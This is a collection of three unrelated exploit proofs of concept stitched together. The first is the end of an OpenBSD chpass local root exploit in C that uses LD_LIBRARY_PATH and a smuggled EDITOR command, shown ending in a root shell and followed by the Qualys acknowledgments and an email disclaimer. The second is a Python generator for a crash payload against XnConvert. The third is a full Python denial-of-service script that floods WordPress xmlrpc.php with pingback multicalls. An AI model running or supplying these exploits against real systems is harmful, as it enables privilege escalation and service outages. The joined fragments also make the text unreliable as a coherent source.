$ gcc -fpic -shared -s -o libutil.so.13.1 lib.c
$ cat > poc.c << "EOF"
#include <string.h>
#include <sys/param.h>
#include <sys/resource.h>
#include <unistd.h>
int
main(int argc, char * const * argv)
{
#define LLP "LD_LIBRARY_PATH=."
static char llp[ARG_MAX - 128];
memset(llp, ':', sizeof(llp)-1);
memcpy(llp, LLP, sizeof(LLP)-1);
char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };
#define DATA (ARG_MAX * sizeof(char *))
const struct rlimit data = { DATA, DATA };
if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__);
if (argc <= 1) _exit(__LINE__);
argv += 1;
execve(argv[0], argv, envp);
_exit(__LINE__);
}
EOF
$ gcc -s -o poc poc.c
$ ./poc /usr/bin/chpass
# id
uid=0(root) gid=0(wheel) groups=32767(nobody)
------------------------------------------------------------------------------
==============================================================================
Acknowledgments
==============================================================================
We thank Theo de Raadt and the OpenBSD developers for their incredibly
quick response: they published a patch for this vulnerability in less
than 3 hours. We also thank MITRE's CVE Assignment Team.
[https://d1dejaj6dcqv24.cloudfront.net/asset/image/email-banner-384-2x.png]<https://www.qualys.com/email-banner>
This message may contain confidential and privileged information. If it has been sent to you in error, please reply to advise the sender of the error and then immediately delete it. If you are not the intended recipient, do not read, copy, disclose or otherwise use this message. The sender disclaims any liability for such unauthorized use. NOTE that all incoming emails sent to Qualys email accounts will be archived and may be scanned by us and/or by external service providers to detect and prevent threats to our systems, investigate illegal or inappropriate behavior, and/or eliminate unsolicited promotional emails (“spam”). If you have any concerns about this process, please contact us.
# Exploit Title: XnConvert 1.82 - Denial of Service (PoC)
# Date: 2019-12-21
# Vendor Homepage: https://www.xnview.com
# Software Link: https://www.xnview.com/en/apps/
# Exploit Author: Gokkulraj (TwinTech Solutions)
# Tested Version: v1.82
# Tested on: Windows 7 x64
# 1.- Download and install XnConvert
# 2.- Run python code : XnConvert.py
# 3.- Open EVIL.txt and copy content to clipboard
# 4.- Open XnConvert and Click 'EnterKey'
# 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash.
#!/usr/bin/env python
Dos= "\x41" * 9000
myfile=open('Evil.txt','w')
myfile.writelines(Dos)
myfile.close()
print("File created")
#!/usr/bin/env python
# WordPress <= 5.3.? Denial-of-Service PoC
# Abusing pingbacks+xmlrpc multicall to exhaust connections
# @roddux 2019 | Arcturus Security | labs.arcturus.net
# TODO:
# - Try and detect a pingback URL on target site
# - Optimise number of entries per request, check class-wp-xmlrpc-server.php
from urllib.parse import urlparse
import sys, uuid, urllib3, requests
urllib3.disable_warnings()
DEBUG = True
def dprint(X):
if DEBUG: print(X)
COUNT=0
def build_entry(pingback,target):
global COUNT
COUNT +=1
entry = "<value><struct><member><name>methodName</name><value>pingback.ping</value></member><member>"
entry += f"<name>params</name><value><array><data><value>{pingback}/{COUNT}</value>"
#entry += f"<name>params</name><value><array><data><value>{pingback}/{uuid.uuid4()}</value>"
entry += f"<value>{target}/?p=1</value></data></array></value></member></struct></value>"
#entry += f"<value>{target}/#e</value></data></array></value></member></struct></value>" # taxes DB more
return entry
def build_request(pingback,target,entries):
prefix = "<methodCall><methodName>system.multicall</methodName><params><param><array>"
suffix = "</array></param></params></methodCall>"
request = prefix
for _ in range(0,entries): request += build_entry(pingback,target)
request += suffix
return request
def usage_die():
print(f"[!] Usage: {sys.argv[0]} <check/attack> <pingback url> <target url>")
exit(1)
def get_args():
if len(sys.argv) != 4: usage_die()
action = sys.argv[1]
pingback = sys.argv[2]
target = sys.argv[3]
if action not in ("check","attack"): usage_die()
for URL in (pingback,target):
res = urlparse(URL)
if not all((res.scheme,res.netloc)): usage_die()
return (action,pingback,target)
def main(action,pingback,target):
print("[>] WordPress <= 5.3.? Denial-of-Service PoC")
print("[>] @roddux 2019 | Arcturus Security | labs.arcturus.net")
# he checc
if action == "check": entries = 2
# he attacc
elif action == "attack": entries = 2000
# but most importantly
print(f"[+] Running in {action} mode")
# he pingbacc
print(f"[+] Got pingback URL \"{pingback}\"")
print(f"[+] Got target URL \"{target}\"")
print(f"[+] Building {entries} pingback calls")
# entries = 1000 # TESTING
xmldata = build_request(pingback,target,entries)
dprint("[+] Request:\n")
dprint(xmldata+"\n")
print(f"[+] Request size: {len(xmldata)} bytes")
if action == "attack":
print("[+] Starting attack loop, CTRL+C to stop...")
rcount = 0
try:
while True:
try:
resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=.2)
#dprint(resp.content.decode("UTF-8")[0:500]+"\n")
if resp.status_code != 200:
print(f"[!] Received odd status ({resp.status_code}) -- DoS successful?")
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
pass
rcount += 1
print(f"\r[+] Requests sent: {rcount}",end="")
except KeyboardInterrupt:
print("\n[>] Attack finished",end="\n\n")
exit(0)
elif action == "check":
print("[+] Sending check request")
try:
resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=10)
if resp.status_code != 200:
print(f"[!] Received odd status ({resp.status_code}) -- check target url")
print("[+] Request sent")
print("[+] Response headers:\n")
print(resp.headers)
print("[+] Response dump:")
print(resp.content.decode("UTF-8"))
print("[+] Here's the part where you figure out if it's vulnerable, because I CBA to code it")
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
print("[!] Connection error")
exit(1)
print("[>] Check finished")
if __name__ == "__main__":
main(*get_args())